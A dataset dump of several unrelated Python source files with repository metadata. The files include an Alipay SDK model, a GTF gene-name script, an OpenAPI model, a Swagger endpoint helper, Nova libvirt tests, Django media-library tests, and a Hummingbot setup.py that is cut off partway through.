for p_name, parameter in self.experiment.search_space.parameters.items():
if not isinstance(parameters[p_name], parameter.python_type):
typ = type(parameters[p_name])
raise ValueError(
f"Value for parameter {p_name} is of type {typ}, expected "
f"{parameter.python_type}. If the intention was to have the "
f"parameter on experiment be of type {typ}, set `value_type` "
f"on experiment creation for {p_name}."
)
# -------- Backward-compatibility with old save / load method names. -------
@staticmethod
def get_recommended_max_parallelism() -> None:
raise NotImplementedError(
"Use `get_max_parallelism` instead; parallelism levels are now "
"enforced in generation strategy, so max parallelism is no longer "
"just recommended."
)
@staticmethod
def load_experiment(experiment_name: str) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def load(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `load_experiment_from_database` to load from SQL database or "
"`load_from_json_file` to load optimization state from .json file."
)
@staticmethod
def save(filepath: Optional[str] = None) -> None:
raise NotImplementedError(
"Use `save_to_json_file` to save optimization state to .json file."
)
| 44.91992 | 88 | 0.634585 |
4a21009e61bad04973ec5c982ad0b2dae0b2ea9e | 1,849 | py | Python | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 1 | 2022-03-07T06:11:10.000Z | 2022-03-07T06:11:10.000Z | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | null | null | null | alipay/aop/api/domain/AlipayOpenAppMessageSubscriptionQueryModel.py | snowxmas/alipay-sdk-python-all | 96870ced60facd96c5bce18d19371720cbda3317 | [
"Apache-2.0"
] | 1 | 2021-10-05T03:01:09.000Z | 2021-10-05T03:01:09.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOpenAppMessageSubscriptionQueryModel(object):
def __init__(self):
self._auth_token = None
self._auth_type = None
self._topic = None
@property
def auth_token(self):
return self._auth_token
@auth_token.setter
def auth_token(self, value):
self._auth_token = value
@property
def auth_type(self):
return self._auth_type
@auth_type.setter
def auth_type(self, value):
self._auth_type = value
@property
def topic(self):
return self._topic
@topic.setter
def topic(self, value):
self._topic = value
def to_alipay_dict(self):
params = dict()
if self.auth_token:
if hasattr(self.auth_token, 'to_alipay_dict'):
params['auth_token'] = self.auth_token.to_alipay_dict()
else:
params['auth_token'] = self.auth_token
if self.auth_type:
if hasattr(self.auth_type, 'to_alipay_dict'):
params['auth_type'] = self.auth_type.to_alipay_dict()
else:
params['auth_type'] = self.auth_type
if self.topic:
if hasattr(self.topic, 'to_alipay_dict'):
params['topic'] = self.topic.to_alipay_dict()
else:
params['topic'] = self.topic
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOpenAppMessageSubscriptionQueryModel()
if 'auth_token' in d:
o.auth_token = d['auth_token']
if 'auth_type' in d:
o.auth_type = d['auth_type']
if 'topic' in d:
o.topic = d['topic']
return o
| 26.042254 | 71 | 0.579232 |
4a210292b494220f2ce2625489484193bc562309 | 995 | py | Python | docker/modify-gtf/SetGeneNameToId.py | lilab-bcb/skylab | d230f2d31ba877db58948a9ed73486cd7c71dd59 | [
"BSD-3-Clause"
] | 45 | 2017-10-12T19:37:29.000Z | 2022-01-22T02:56:57.000Z | docker/modify-gtf/SetGeneNameToId.py | lilab-bcb/skylab | d230f2d31ba877db58948a9ed73486cd7c71dd59 | [
"BSD-3-Clause"
] | 203 | 2017-08-15T13:50:21.000Z | 2021-02-18T01:20:25.000Z | docker/modify-gtf/SetGeneNameToId.py | truwl/skylab | e31492cd0219ff6f236cd0500401004f16f0fe41 | [
"BSD-3-Clause"
] | 42 | 2017-09-13T14:44:36.000Z | 2022-03-15T09:27:52.000Z | #!/usr/bin/env python
import argparse
import re
parser = argparse.ArgumentParser(description="Set the gene_name within a gtf to be equivalent to the values within gene_id.")
parser.add_argument('--in-gtf-file', dest='ingtf', help='input gtf file')
parser.add_argument('--out-gtf-file', dest='outgtf', help='output gtf file')
args = parser.parse_args()
def setGeneNameToId(in_gtf, out_gtf, verbose=True):
with open(in_gtf, 'r') as fpin, open(out_gtf, 'w') as fpout:
for line in fpin:
stripped_line = line.strip()
gene_id = re.search(r'gene_id ([^;]*);', stripped_line)
gene_name = re.search(r'gene_name ([^;]*);', stripped_line)
if gene_id and gene_name:
modified_line = re.sub(r'gene_name ([^;]*);', 'gene_name ' + gene_id.group(1) + ";", stripped_line)
fpout.write(modified_line + '\n')
else:
fpout.write(stripped_line + '\n')
setGeneNameToId(args.ingtf, args.outgtf)
| 38.269231 | 125 | 0.632161 |
4a2102942a67e64aa942084dd11ea6c462a2a366 | 9,141 | py | Python | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | [
"MIT"
] | 4 | 2020-02-21T16:30:46.000Z | 2021-01-12T12:22:03.000Z | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | [
"MIT"
] | 4 | 2019-12-28T19:30:08.000Z | 2020-03-31T19:27:45.000Z | presalytics/client/presalytics_ooxml_automation/models/shared_paragraph_details.py | presalytics/python-client | 5d80b78562126feeeb49af4738e2c1aed12dce3a | [
"MIT"
] | null | null | null | # coding: utf-8
"""
OOXML Automation
This API helps users convert Excel and Powerpoint documents into rich, live dashboards and stories. # noqa: E501
The version of the OpenAPI document: 0.1.0-no-tags
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class SharedParagraphDetails(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'text_container_id': 'str',
'text_container': 'SharedTextContainerDetails',
'number': 'int',
'text': 'list[SharedTextDetails]',
'id': 'str',
'date_created': 'datetime',
'user_created': 'str',
'date_modified': 'datetime',
'user_modified': 'str'
}
attribute_map = {
'text_container_id': 'textContainerId',
'text_container': 'textContainer',
'number': 'number',
'text': 'text',
'id': 'id',
'date_created': 'dateCreated',
'user_created': 'userCreated',
'date_modified': 'dateModified',
'user_modified': 'userModified'
}
def __init__(self, text_container_id=None, text_container=None, number=None, text=None, id=None, date_created=None, user_created=None, date_modified=None, user_modified=None): # noqa: E501
"""SharedParagraphDetails - a model defined in OpenAPI""" # noqa: E501
self._text_container_id = None
self._text_container = None
self._number = None
self._text = None
self._id = None
self._date_created = None
self._user_created = None
self._date_modified = None
self._user_modified = None
self.discriminator = None
self.text_container_id = text_container_id
if text_container is not None:
self.text_container = text_container
if number is not None:
self.number = number
self.text = text
if id is not None:
self.id = id
if date_created is not None:
self.date_created = date_created
if user_created is not None:
self.user_created = user_created
if date_modified is not None:
self.date_modified = date_modified
if user_modified is not None:
self.user_modified = user_modified
@property
def text_container_id(self):
"""Gets the text_container_id of this SharedParagraphDetails. # noqa: E501
:return: The text_container_id of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._text_container_id
@text_container_id.setter
def text_container_id(self, text_container_id):
"""Sets the text_container_id of this SharedParagraphDetails.
:param text_container_id: The text_container_id of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._text_container_id = text_container_id
@property
def text_container(self):
"""Gets the text_container of this SharedParagraphDetails. # noqa: E501
:return: The text_container of this SharedParagraphDetails. # noqa: E501
:rtype: SharedTextContainerDetails
"""
return self._text_container
@text_container.setter
def text_container(self, text_container):
"""Sets the text_container of this SharedParagraphDetails.
:param text_container: The text_container of this SharedParagraphDetails. # noqa: E501
:type: SharedTextContainerDetails
"""
self._text_container = text_container
@property
def number(self):
"""Gets the number of this SharedParagraphDetails. # noqa: E501
:return: The number of this SharedParagraphDetails. # noqa: E501
:rtype: int
"""
return self._number
@number.setter
def number(self, number):
"""Sets the number of this SharedParagraphDetails.
:param number: The number of this SharedParagraphDetails. # noqa: E501
:type: int
"""
self._number = number
@property
def text(self):
"""Gets the text of this SharedParagraphDetails. # noqa: E501
:return: The text of this SharedParagraphDetails. # noqa: E501
:rtype: list[SharedTextDetails]
"""
return self._text
@text.setter
def text(self, text):
"""Sets the text of this SharedParagraphDetails.
:param text: The text of this SharedParagraphDetails. # noqa: E501
:type: list[SharedTextDetails]
"""
self._text = text
@property
def id(self):
"""Gets the id of this SharedParagraphDetails. # noqa: E501
:return: The id of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this SharedParagraphDetails.
:param id: The id of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._id = id
@property
def date_created(self):
"""Gets the date_created of this SharedParagraphDetails. # noqa: E501
:return: The date_created of this SharedParagraphDetails. # noqa: E501
:rtype: datetime
"""
return self._date_created
@date_created.setter
def date_created(self, date_created):
"""Sets the date_created of this SharedParagraphDetails.
:param date_created: The date_created of this SharedParagraphDetails. # noqa: E501
:type: datetime
"""
self._date_created = date_created
@property
def user_created(self):
"""Gets the user_created of this SharedParagraphDetails. # noqa: E501
:return: The user_created of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._user_created
@user_created.setter
def user_created(self, user_created):
"""Sets the user_created of this SharedParagraphDetails.
:param user_created: The user_created of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._user_created = user_created
@property
def date_modified(self):
"""Gets the date_modified of this SharedParagraphDetails. # noqa: E501
:return: The date_modified of this SharedParagraphDetails. # noqa: E501
:rtype: datetime
"""
return self._date_modified
@date_modified.setter
def date_modified(self, date_modified):
"""Sets the date_modified of this SharedParagraphDetails.
:param date_modified: The date_modified of this SharedParagraphDetails. # noqa: E501
:type: datetime
"""
self._date_modified = date_modified
@property
def user_modified(self):
"""Gets the user_modified of this SharedParagraphDetails. # noqa: E501
:return: The user_modified of this SharedParagraphDetails. # noqa: E501
:rtype: str
"""
return self._user_modified
@user_modified.setter
def user_modified(self, user_modified):
"""Sets the user_modified of this SharedParagraphDetails.
:param user_modified: The user_modified of this SharedParagraphDetails. # noqa: E501
:type: str
"""
self._user_modified = user_modified
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SharedParagraphDetails):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 28.655172 | 193 | 0.613828 |
4a2102f4272ede7c43a23efd9b875483014ddf6f | 3,648 | py | Python | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | [
"MIT"
] | null | null | null | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | [
"MIT"
] | null | null | null | swagger_gen/lib/endpoint.py | danleonard-nj/swagger-gen | dd0be9c82107b9977a2af0f90644eccde8ed2ef3 | [
"MIT"
] | null | null | null | from swagger_gen.lib.utils import element_at, not_null
from swagger_gen.lib.constants import Method
from werkzeug.routing import Rule
from typing import List
class SwaggerEndpoint:
def __init__(self, rule: Rule):
not_null(rule, 'rule')
self._rule = rule
@property
def view_function_name(self):
''' The name of the method that defines the route '''
return self._rule.endpoint
@property
def methods(self):
''' The allowed methods on the route '''
return self._get_methods()
@property
def component_key(self) -> str:
'''Key linking the path and the component in the spec'''
return self._get_view_name()
@property
def endpoint_literal(self) -> str:
''' The endpoint name to display on the Swagger page '''
return self._format_route_literal()
@property
def segment_params(self):
'''URL segment parameters'''
return self._rule.arguments
@property
def tag(self):
''' The section name that groups the endpoints in the Swagger UI '''
return self._get_endpoint_tag()
def _get_view_name(self) -> str:
'''Get the formatted view name, removing blueprint prefixes'''
not_null(self._rule.endpoint, 'endpoint')
segments = self._rule.endpoint.split('.')
if len(segments) > 1:
return segments[1]
return self._rule.endpoint
def _get_endpoint_tag(self) -> str:
'''
Get the endpoint tag. The tag becomes the title of the group of
endpoints sharing a common base path.
When generating documentation dynamically from the app routes,
the only thing we have to go with w/r/t grouping endpoints together
is the base segment of the URL. As a result, if the base segment
is the same for every endpoint, they'll all be grouped under one
section. A common scenario is an /api prefix on the route. So to
avoid this (specific scenario) we'll strip off the /api prefix if
it exists
TODO: Expose a parameter on `swagger_metadata` to pass in a specific
tag in the event we want to override the automatic tag for something
more specific, etc
'''
endpoint_segments = self._rule.rule.split('/')
tag_position = 1
if element_at(endpoint_segments, 1) == 'api':
tag_position = 2
# Get the tag segment from the index of the segment list
endpoint_tag = element_at(
_iterable=endpoint_segments,
index=tag_position)
if not endpoint_tag:
raise Exception(
f'Failed to parse tag from endpoint: {self._rule.rule}')
return endpoint_tag
def _format_route_literal(self) -> str:
'''
Swap carets for curly braces in the endpoint parameters. The Flask
routes require route segments to be enclosed in carats. In order for
Swagger UI to handle the segments, they need to be enclosed in curly
braces
Flask: `<order_id`>
Swagger: `{order_id}`
'''
route = self._rule.rule
not_null(route, 'route')
if '<' in route:
route = (route.replace(
'<', '{').replace(
'>', '}')
)
return route
def _get_methods(self) -> List[str]:
'''Get display methods, ignoring OPTIONS and HEAD'''
return ([
method for method in self._rule.methods
if method not in [
Method.OPTIONS,
Method.HEAD]
])
| 30.915254 | 77 | 0.609101 |
4a2103b5cec4d623eb06a0fd0eec7b2d7b426ee3 | 9,086 | py | Python | nova/tests/functional/libvirt/test_report_cpu_traits.py | maya2250/nova | e483ca1cd9a5db5856f87fc69ca07c42d2be5def | [
"Apache-2.0"
] | null | null | null | nova/tests/functional/libvirt/test_report_cpu_traits.py | maya2250/nova | e483ca1cd9a5db5856f87fc69ca07c42d2be5def | [
"Apache-2.0"
] | 1 | 2020-11-05T17:42:24.000Z | 2020-11-05T17:42:24.000Z | nova/tests/functional/libvirt/test_report_cpu_traits.py | Mattlk13/nova | 5b13eb59540aaf535a53920e783964d106de2620 | [
"Apache-2.0"
] | 1 | 2020-07-22T22:14:40.000Z | 2020-07-22T22:14:40.000Z | # Copyright (c) 2018 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import os_resource_classes as orc
import os_traits as ost
from nova import conf
from nova.db import constants as db_const
from nova import test
from nova.tests.functional.libvirt import integrated_helpers
from nova.tests.unit.virt.libvirt import fakelibvirt
from nova.virt.libvirt.host import SEV_KERNEL_PARAM_FILE
CONF = conf.CONF
class LibvirtReportTraitsTestBase(
integrated_helpers.LibvirtProviderUsageBaseTestCase):
pass
def assertMemEncryptionSlotsEqual(self, slots):
inventory = self._get_provider_inventory(self.host_uuid)
if slots == 0:
self.assertNotIn(orc.MEM_ENCRYPTION_CONTEXT, inventory)
else:
self.assertEqual(
inventory[orc.MEM_ENCRYPTION_CONTEXT],
{
'total': slots,
'min_unit': 1,
'max_unit': 1,
'step_size': 1,
'allocation_ratio': 1.0,
'reserved': 0,
}
)
class LibvirtReportTraitsTests(LibvirtReportTraitsTestBase):
def test_report_cpu_traits(self):
self.assertEqual([], self._get_all_providers())
self.start_compute()
# Test CPU traits reported on initial node startup, these specific
# trait values are coming from fakelibvirt's baselineCPU result.
# COMPUTE_NODE is always set on the compute node provider.
traits = self._get_provider_traits(self.host_uuid)
for trait in ('HW_CPU_X86_VMX', 'HW_CPU_X86_AESNI', 'COMPUTE_NODE'):
self.assertIn(trait, traits)
self._create_trait('CUSTOM_TRAITS')
new_traits = ['CUSTOM_TRAITS', 'HW_CPU_X86_AVX']
self._set_provider_traits(self.host_uuid, new_traits)
# The above is an out-of-band placement operation, as if the operator
# used the CLI. So now we have to "SIGHUP the compute process" to clear
# the report client cache so the subsequent update picks up the change.
self.compute.manager.reset()
self._run_periodics()
# HW_CPU_X86_AVX is filtered out because nova-compute owns CPU traits
# and it's not in the baseline for the host.
traits = set(self._get_provider_traits(self.host_uuid))
expected_traits = self.expected_libvirt_driver_capability_traits.union(
[u'HW_CPU_X86_VMX', u'HW_CPU_X86_AESNI', u'CUSTOM_TRAITS',
# The periodic restored the COMPUTE_NODE trait.
u'COMPUTE_NODE']
)
self.assertItemsEqual(expected_traits, traits)
class LibvirtReportNoSevTraitsTests(LibvirtReportTraitsTestBase):
STUB_INIT_HOST = False
@test.patch_exists(SEV_KERNEL_PARAM_FILE, False)
def setUp(self):
super(LibvirtReportNoSevTraitsTests, self).setUp()
self.start_compute()
def test_sev_trait_off_on(self):
"""Test that the compute service reports the SEV trait in the list of
global traits, but doesn't immediately register it on the
compute host resource provider in the placement API, due to
the kvm-amd kernel module's sev parameter file being (mocked
as) absent.
Then test that if the SEV capability appears (again via
mocking), after a restart of the compute service, the trait
gets registered on the compute host.
Also test that on both occasions, the inventory of the
MEM_ENCRYPTION_CONTEXT resource class on the compute host
corresponds to the absence or presence of the SEV capability.
"""
self.assertFalse(self.compute.driver._host.supports_amd_sev)
sev_trait = ost.HW_CPU_X86_AMD_SEV
global_traits = self._get_all_traits()
self.assertIn(sev_trait, global_traits)
traits = self._get_provider_traits(self.host_uuid)
self.assertNotIn(sev_trait, traits)
self.assertMemEncryptionSlotsEqual(0)
# Now simulate the host gaining SEV functionality. Here we
# simulate a kernel update or reconfiguration which causes the
# kvm-amd kernel module's "sev" parameter to become available
# and set to 1, however it could also happen via a libvirt
# upgrade, for instance.
sev_features = \
fakelibvirt.virConnect._domain_capability_features_with_SEV
with test.nested(
self.patch_exists(SEV_KERNEL_PARAM_FILE, True),
self.patch_open(SEV_KERNEL_PARAM_FILE, "1\n"),
mock.patch.object(fakelibvirt.virConnect,
'_domain_capability_features',
new=sev_features)
) as (mock_exists, mock_open, mock_features):
# Retrigger the detection code. In the real world this
# would be a restart of the compute service.
self.compute.driver._host._set_amd_sev_support()
self.assertTrue(self.compute.driver._host.supports_amd_sev)
mock_exists.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
mock_open.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
# However it won't disappear in the provider tree and get synced
# back to placement until we force a reinventory:
self.compute.manager.reset()
self._run_periodics()
traits = self._get_provider_traits(self.host_uuid)
self.assertIn(sev_trait, traits)
# Sanity check that we've still got the trait globally.
self.assertIn(sev_trait, self._get_all_traits())
self.assertMemEncryptionSlotsEqual(db_const.MAX_INT)
class LibvirtReportSevTraitsTests(LibvirtReportTraitsTestBase):
STUB_INIT_HOST = False
@test.patch_exists(SEV_KERNEL_PARAM_FILE, True)
@test.patch_open(SEV_KERNEL_PARAM_FILE, "1\n")
@mock.patch.object(
fakelibvirt.virConnect, '_domain_capability_features',
new=fakelibvirt.virConnect._domain_capability_features_with_SEV)
def setUp(self):
super(LibvirtReportSevTraitsTests, self).setUp()
self.flags(num_memory_encrypted_guests=16, group='libvirt')
self.start_compute()
def test_sev_trait_on_off(self):
"""Test that the compute service reports the SEV trait in the list of
global traits, and immediately registers it on the compute
host resource provider in the placement API, due to the SEV
capability being (mocked as) present.
Then test that if the SEV capability disappears (again via
mocking), after a restart of the compute service, the trait
gets removed from the compute host.
Also test that on both occasions, the inventory of the
MEM_ENCRYPTION_CONTEXT resource class on the compute host
corresponds to the absence or presence of the SEV capability.
"""
self.assertTrue(self.compute.driver._host.supports_amd_sev)
sev_trait = ost.HW_CPU_X86_AMD_SEV
global_traits = self._get_all_traits()
self.assertIn(sev_trait, global_traits)
traits = self._get_provider_traits(self.host_uuid)
self.assertIn(sev_trait, traits)
self.assertMemEncryptionSlotsEqual(16)
# Now simulate the host losing SEV functionality. Here we
# simulate a kernel downgrade or reconfiguration which causes
# the kvm-amd kernel module's "sev" parameter to become
# unavailable, however it could also happen via a libvirt
# downgrade, for instance.
with self.patch_exists(SEV_KERNEL_PARAM_FILE, False) as mock_exists:
# Retrigger the detection code. In the real world this
# would be a restart of the compute service.
self.compute.driver._host._set_amd_sev_support()
self.assertFalse(self.compute.driver._host.supports_amd_sev)
mock_exists.assert_has_calls([mock.call(SEV_KERNEL_PARAM_FILE)])
# However it won't disappear in the provider tree and get synced
# back to placement until we force a reinventory:
self.compute.manager.reset()
self._run_periodics()
traits = self._get_provider_traits(self.host_uuid)
self.assertNotIn(sev_trait, traits)
# Sanity check that we've still got the trait globally.
self.assertIn(sev_trait, self._get_all_traits())
self.assertMemEncryptionSlotsEqual(0)
| 41.488584 | 79 | 0.678186 |
4a21043ab9dd1485c8ef18122db858cc94b7066b | 3,782 | py | Python | media_library/tests/models_tests.py | bitlabstudio/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | [
"MIT"
] | 1 | 2021-01-13T17:37:54.000Z | 2021-01-13T17:37:54.000Z | media_library/tests/models_tests.py | bitmazk/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | [
"MIT"
] | null | null | null | media_library/tests/models_tests.py | bitmazk/django-media-library | f3c8a09bff9abbee79b351b5bf5eea7ece52180d | [
"MIT"
] | null | null | null | """Tests for the models of the ``media_library`` app."""
from django.test import TestCase
from user_media.models import UserMediaImage
from user_media.tests.factories import UserMediaImageFactory
from . import factories
class MediaLibraryTestCase(TestCase):
"""Tests for the ``MediaLibrary`` model class."""
longMessage = True
def setUp(self):
self.library = factories.MediaLibraryFactory()
def test_instantiation(self):
self.assertTrue(self.library.pk)
def test_media_images(self):
image = factories.MediaItemFactory(
image=UserMediaImageFactory(),
library=self.library,
video=None,
)
factories.MediaItemFactory(library=self.library)
self.assertEqual(
self.library.media_images().count(), 1, msg=(
'``media_images`` should return only one item.'
)
)
self.assertEqual(
self.library.media_images()[0], image, msg=(
'``media_images`` should return the created image.'
)
)
def test_media_videos(self):
factories.MediaItemFactory(
image=UserMediaImageFactory(),
library=self.library,
video=None,
)
video = factories.MediaItemFactory(library=self.library)
self.assertEqual(
self.library.media_videos().count(), 1, msg=(
'``media_videos`` should return only one item.'
)
)
self.assertEqual(
self.library.media_videos()[0], video, msg=(
'``media_videos`` should return the created video.'
)
)
class MediaItemTestCase(TestCase):
"""Tests for the ``MediaItem`` model class."""
longMessage = True
def assertNotRaises(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as ex:
self.fail(msg=(
'"{0}" should not have raised an exception, but raised'
' "{1}"'.format(repr(func), str(ex))
))
def setUp(self):
self.library = factories.MediaLibraryFactory()
self.mediaitem = factories.MediaItemFactory(
showreel=self.library,
video='https://youtube.com/watch?v=123456',
)
self.umedia_image = UserMediaImageFactory()
self.mediaitemimage = factories.MediaItemFactory(
video=None, image=self.umedia_image,
)
def test_delete(self):
self.mediaitemimage.delete()
self.assertEqual(UserMediaImage.objects.count(), 0, msg=(
'The user media images should have been deleted as well.'
))
def test_instantiation(self):
self.assertTrue(self.mediaitem.pk)
def test_video_id(self):
self.assertEqual(self.mediaitem.video_id, '123456', msg=(
'The property should have returned the correct video id.'
))
def test_clean(self):
linklist = [
'http://www.youtube.com/watch?v=-JyZLS2IhkQ',
'https://www.youtube.com/watch?v=-JyZLS2IhkQ',
'http://www.youtube.de/watch?v=-JyZLS2IhkQ',
'https://youtube.com/watch?v=-JyZLS2IhkQ',
('https://www.youtube.com/watch?v=PguLNvCcOHQ'
'&list=RDPguLNvCcOHQ#t=0'),
'http://youtu.be/PguLNvCcOHQ?list=RDPguLNvCcOHQ ',
'http://vimeo.com/channels/staffpicks/110140870',
'http://vimeo.com/59777392',
'http://vimeo.com/video/59777392',
('http://vimeo.com/groups/thedirectorofphotography/'
'videos/110016243'),
]
for link in linklist:
self.mediaitem.video = link
self.assertNotRaises(self.mediaitem.clean)
| 33.469027 | 71 | 0.589635 |
4a2104d9f87334697b3d34823c513688abebce88 | 2,532 | py | Python | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 5 | 2019-05-16T09:51:29.000Z | 2021-05-31T09:30:03.000Z | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 107 | 2019-05-24T12:19:02.000Z | 2022-03-23T15:05:56.000Z | core/src/zeit/cms/syndication/mytargets.py | rickdg/vivi | 16134ac954bf8425646d4ad47bdd1f372e089355 | [
"BSD-3-Clause"
] | 3 | 2020-08-14T11:01:17.000Z | 2022-01-08T17:32:19.000Z | import persistent
import BTrees
import zope.annotation
import zope.component
import zope.interface
import zope.container.contained
import zope.app.keyreference.interfaces
import zeit.cms.content.property
import zeit.cms.repository.interfaces
import zeit.cms.workingcopy.interfaces
import zeit.cms.syndication.interfaces
@zope.component.adapter(zeit.cms.workingcopy.interfaces.IWorkingcopy)
@zope.interface.implementer(
zeit.cms.syndication.interfaces.IMySyndicationTargets)
class MySyndicationTargets(persistent.Persistent,
zope.container.contained.Contained):
default_targets = (
'http://xml.zeit.de/hp_channels/r07_hp_aufmacher',
'http://xml.zeit.de/hp_channels/r07_hp_knopf',
'http://xml.zeit.de/hp_channels/channel_news',
'http://xml.zeit.de/hp_channels/channel_magazin',
'http://xml.zeit.de/hp_channels/channel_exklusiv_reform.xm',
'http://xml.zeit.de/deutschland/channel_deutschland',
'http://xml.zeit.de/international/channel_international',
'http://xml.zeit.de/meinung/channel_meinung',
'http://xml.zeit.de/wirtschaft/channel_wirtschaft',
'http://xml.zeit.de/wissen/channel_wissen',
'http://xml.zeit.de/kultur/channel_kultur',
'http://xml.zeit.de/leben/channel_leben',
'http://xml.zeit.de/bildung/channel_bildung',
'http://xml.zeit.de/musik/channel_musik',
)
def __init__(self):
self.targets = BTrees.family32.OI.TreeSet()
self._initalize_defaults()
def add(self, feed):
self.targets.insert(
zope.app.keyreference.interfaces.IKeyReference(feed))
def remove(self, feed):
try:
self.targets.remove(
zope.app.keyreference.interfaces.IKeyReference(feed))
except KeyError:
pass
def __contains__(self, feed):
return (zope.app.keyreference.interfaces.IKeyReference(feed)
in self.targets)
def __iter__(self):
for keyref in self.targets:
try:
yield keyref()
except KeyError:
pass
def _initalize_defaults(self):
repository = zope.component.getUtility(
zeit.cms.repository.interfaces.IRepository)
for id in self.default_targets:
try:
feed = repository.getContent(id)
except KeyError:
continue
self.add(feed)
targetFactory = zope.annotation.factory(MySyndicationTargets)
| 32.050633 | 69 | 0.662322 |
4a2104f38464d32a31195b16051efd4f61ba1806 | 4,673 | py | Python | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | [
"Apache-2.0"
] | 2 | 2020-10-06T15:00:31.000Z | 2021-03-05T16:37:39.000Z | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | [
"Apache-2.0"
] | null | null | null | setup.py | sosaucily/hummingbot | 082883319253399b2c7a321c709c97dcd84b9b72 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup
from Cython.Build import cythonize
import numpy as np
import os
import subprocess
import sys
is_posix = (os.name == "posix")
if is_posix:
os_name = subprocess.check_output("uname").decode("utf8")
if "Darwin" in os_name:
os.environ["CFLAGS"] = "-stdlib=libc++ -std=c++11"
else:
os.environ["CFLAGS"] = "-std=c++11"
def main():
cpu_count = os.cpu_count() or 8
version = "20201123"
packages = [
"hummingbot",
"hummingbot.client",
"hummingbot.client.command",
"hummingbot.client.config",
"hummingbot.client.ui",
"hummingbot.core",
"hummingbot.core.data_type",
"hummingbot.core.event",
"hummingbot.core.management",
"hummingbot.core.utils",
"hummingbot.data_feed",
"hummingbot.logger",
"hummingbot.market",
"hummingbot.connector",
"hummingbot.connector.connector",
"hummingbot.connector.connector.balancer",
"hummingbot.connector.exchange",
"hummingbot.connector.exchange.binance",
"hummingbot.connector.exchange.bitfinex",
"hummingbot.connector.exchange.bittrex",
"hummingbot.connector.exchange.bamboo_relay",
"hummingbot.connector.exchange.coinbase_pro",
"hummingbot.connector.exchange.huobi",
"hummingbot.connector.exchange.radar_relay",
"hummingbot.connector.exchange.kraken",
"hummingbot.connector.exchange.crypto_com",
"hummingbot.connector.exchange.kucoin",
"hummingbot.connector.exchange.loopring",
"hummingbot.connector.exchange.okex",
"hummingbot.connector.derivative",
"hummingbot.connector.derivative.binance_perpetual",
"hummingbot.script",
"hummingbot.strategy",
"hummingbot.strategy.amm_arb",
"hummingbot.strategy.arbitrage",
"hummingbot.strategy.cross_exchange_market_making",
"hummingbot.strategy.pure_market_making",
"hummingbot.strategy.perpetual_market_making",
"hummingbot.templates",
"hummingbot.wallet",
"hummingbot.wallet.ethereum",
"hummingbot.wallet.ethereum.uniswap",
"hummingbot.wallet.ethereum.watcher",
"hummingbot.wallet.ethereum.zero_ex",
]
package_data = {
"hummingbot": [
"core/cpp/*",
